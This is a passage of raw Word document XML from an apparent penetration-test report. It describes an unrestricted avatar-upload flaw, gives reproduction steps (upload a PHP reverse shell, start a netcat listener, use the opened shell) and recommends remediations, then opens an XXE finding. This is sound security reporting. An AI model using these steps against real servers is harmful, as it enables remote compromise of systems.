                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R3f1f8fb84eeb4f9a">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1204.002: User Execution - Malicious File</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="027D7944">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FF470DB"/>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DC64FCB" w14:textId="7E91ADD0">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F4EFA21" w14:textId="6664C515">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441b0b22dd9f427b">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">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r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="21B22A81" w14:textId="217E8A47">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R3d75810a74ed4d1b">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1050: Exploit Protection</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="73EE677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4DEA38" w14:textId="4F39E4E5">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FBBF85C" w14:textId="7B4CF08C">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FF1A08C" w14:textId="5EFE1D0A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="7E60F6A5" w:rsidP="0D325B6E" w:rsidRDefault="7E60F6A5" w14:paraId="198AF2C6" w14:textId="4D123F8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E60F6A5" w:rsidP="0D325B6E" w:rsidRDefault="7E60F6A5" w14:paraId="4F679486" w14:textId="543CACE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7E60F6A5">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 Upload</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allows </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1A61102E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1A61102E">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to upload any arbitrary file type. This allows</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9C22703">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="09C22703">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rs</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to upload malicious code as their avatar picture</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="73ADDF14">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4C313F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">which </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wil</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l </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4BAA78BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>be ex</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4BAA78BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ecuted</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on the backend server when uploade</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d and </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re</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ndered</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3B55C13A" w14:textId="59F917E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7E60F6A5" w:rsidP="0D325B6E" w:rsidRDefault="7E60F6A5" w14:paraId="0E35F38D" w14:textId="7F59D6E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E60F6A5" w:rsidP="0D325B6E" w:rsidRDefault="7E60F6A5" w14:paraId="4DFD45FB" w14:textId="2C955757">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This vulnerability gives attackers remote code execution on the backend server. This can lead to system compromise if attackers execute a reverse shell script</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="56432DF4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, which compromises the integrity of the web server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="4E84E3D1" w14:textId="48776476">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="7E60F6A5" w:rsidP="0D325B6E" w:rsidRDefault="7E60F6A5" w14:paraId="694CE083" w14:textId="6A2E2A1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7E60F6A5" w:rsidP="0D325B6E" w:rsidRDefault="7E60F6A5" w14:paraId="2EB1A2F1" w14:textId="505AB1A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Step 1: Navigate to the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7E60F6A5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Edit Profile</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page and select </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7E60F6A5">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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7E60F6A5" w:rsidP="0D325B6E" w:rsidRDefault="7E60F6A5" w14:paraId="4B22A55C" w14:textId="586602B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Step 2: Upload a PHP reverse shell as the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7E60F6A5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>avatar image</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7E60F6A5" w:rsidP="0D325B6E" w:rsidRDefault="7E60F6A5" w14:paraId="547218FC" w14:textId="7FA22BB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Step 3: Start a </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0F847C93">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etcat</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listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7E60F6A5" w:rsidP="0D325B6E" w:rsidRDefault="7E60F6A5" w14:paraId="29CCB9BD" w14:textId="7B1DC7F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Step 4: Click save to upload the reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7E60F6A5" w:rsidP="0D325B6E" w:rsidRDefault="7E60F6A5" w14:paraId="5ED9DDDA" w14:textId="3170AE6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Step 5: </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5F45169">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">the opened shell </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on </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5B7E1184">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569145F6">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etcat listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="71A8F70D" w14:textId="412E4B8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7E60F6A5" w:rsidP="0D325B6E" w:rsidRDefault="7E60F6A5" w14:paraId="240F0A39" w14:textId="79716AA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7E60F6A5" w:rsidP="0D325B6E" w:rsidRDefault="7E60F6A5" w14:paraId="4C2C671A" w14:textId="630B79A6">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7E60F6A5" w:rsidP="0D325B6E" w:rsidRDefault="7E60F6A5" w14:paraId="3C2E3742" w14:textId="654752A4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Enforce file type restrictions through a whitelist, such that only common image types should be allowed, such as .img, .jpg, .png. Disallow all other file types.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7E60F6A5" w:rsidP="0D325B6E" w:rsidRDefault="7E60F6A5" w14:paraId="7D1D1B07" w14:textId="389DD959">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Set the permission of user uploaded files to be non-executable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7E60F6A5" w:rsidP="0D325B6E" w:rsidRDefault="7E60F6A5" w14:paraId="1B88335C" w14:textId="21E551E6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Containerize the application to minimize impact in case of abuse.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7E60F6A5" w:rsidP="0D325B6E" w:rsidRDefault="7E60F6A5" w14:paraId="5A874D08" w14:textId="2D369403">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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60F6A5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Utilize a web application firewall to filter malicious uploads.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1136A134" w:rsidP="0D325B6E" w:rsidRDefault="1136A134" w14:paraId="43DBCC72" w14:textId="274C6E83">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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136A134">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permissions to avoid remote command execution on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="7E2F1855" w14:textId="6DD1672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7E60F6A5" w:rsidP="0D325B6E" w:rsidRDefault="7E60F6A5" w14:paraId="621A433E" w14:textId="1088845C">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7E60F6A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E60F6A5" w:rsidP="0D325B6E" w:rsidRDefault="7E60F6A5" w14:paraId="2FCBAC03" w14:textId="350EE73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c835b4dd843843cf">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="7E60F6A5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Pentestmonkey: PHP Reverse Shell</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="7E60F6A5" w:rsidP="0D325B6E" w:rsidRDefault="7E60F6A5" w14:paraId="1CE06DF5" w14:textId="47D1A67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hyperlink r:id="R6af916204e304782">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="7E60F6A5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>OWASP - Unrestricted File Upload</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="395FC739" w:rsidP="0D325B6E" w:rsidRDefault="395FC739" w14:paraId="14BE85F9" w14:textId="57C6B5A4">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="Rcaa8bbe924c446ab">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="395FC739">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Palo Alto Networks: How to Deploy Web Application Firewalls</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="6C17DA88" w14:textId="3B92B8BB">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44AA64F2" w14:textId="35AB52A0">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="4438712C" w14:textId="4A5B1D34">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="3C50FA80" w14:textId="177CCE26">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="03D3421E" w14:textId="343CC54C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="2CD6CF15" w14:textId="4FF0111E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="00AD7334" w14:textId="21F4D7CF">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="2821D3F1" w14:textId="320FCBA4">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="2E69ED6B" w14:textId="5CC5C431">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="09EE90A7" w14:textId="697887D0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="061A588A" w14:textId="186DAC2D">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="1770A882" w:rsidP="0D325B6E" w:rsidRDefault="1770A882" w14:paraId="2495183C" w14:textId="2EF54AB5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc1699292968" w:id="717346368"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1770A882">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1770A882">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>H1:</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc62928079" w:id="815304680"/>
      <w:bookmarkStart w:name="_Toc1118266099" w:id="820262046"/>
      <w:bookmarkStart w:name="_Toc284926539" w:id="1127342667"/>
      <w:bookmarkStart w:name="_Toc444946638" w:id="1829460188"/>
      <w:bookmarkStart w:name="_Toc1700521725" w:id="1243445566"/>
      <w:bookmarkStart w:name="_Toc541461937" w:id="1701371507"/>
      <w:bookmarkStart w:name="_Toc1270158668" w:id="251006795"/>
      <w:bookmarkStart w:name="_Toc1562528992" w:id="497889659"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="307E7360">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="56EC75B1">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XML External Entity (XXE)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1701371507"/>
      <w:bookmarkEnd w:id="251006795"/>
      <w:bookmarkEnd w:id="497889659"/>
      <w:bookmarkEnd w:id="815304680"/>
      <w:bookmarkEnd w:id="820262046"/>
      <w:bookmarkEnd w:id="1127342667"/>
      <w:bookmarkEnd w:id="1829460188"/>
      <w:bookmarkEnd w:id="1243445566"/>
      <w:bookmarkEnd w:id="71734636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3C91E96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CAC4C7" w14:textId="1F45F7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0B3398" w14:textId="6D440D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3BA168D" w14:textId="6A0AC6F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7EA0DE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A4EB14E" w14:textId="5D5090B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69ED5D1" w14:textId="4F85F045">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21DDB29" w14:textId="225A5F6D">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8AAC553" w14:textId="67366921">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6CCE8F9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AEEDFCA" w14:textId="20278D5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AA0B36B" w:rsidP="0D325B6E" w:rsidRDefault="7AA0B36B" w14:paraId="3872DB4F" w14:textId="70CCF7AC">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7AA0B36B">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2A2DEA5"/>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4EE9063"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="0890A87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3D5E82" w14:textId="67940CD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8680C73" w:rsidP="0D325B6E" w:rsidRDefault="58680C73" w14:paraId="3370E4FA" w14:textId="748FEB36">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N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N" r:id="Rd5d77f687c354363">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="58680C73">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AV:N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AC:L</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AT:N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PR:N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UI:N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VC:L</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VI:L</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VA:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="58680C73">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>H/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="58680C73">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>SC:N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SI:N</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="58680C73">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
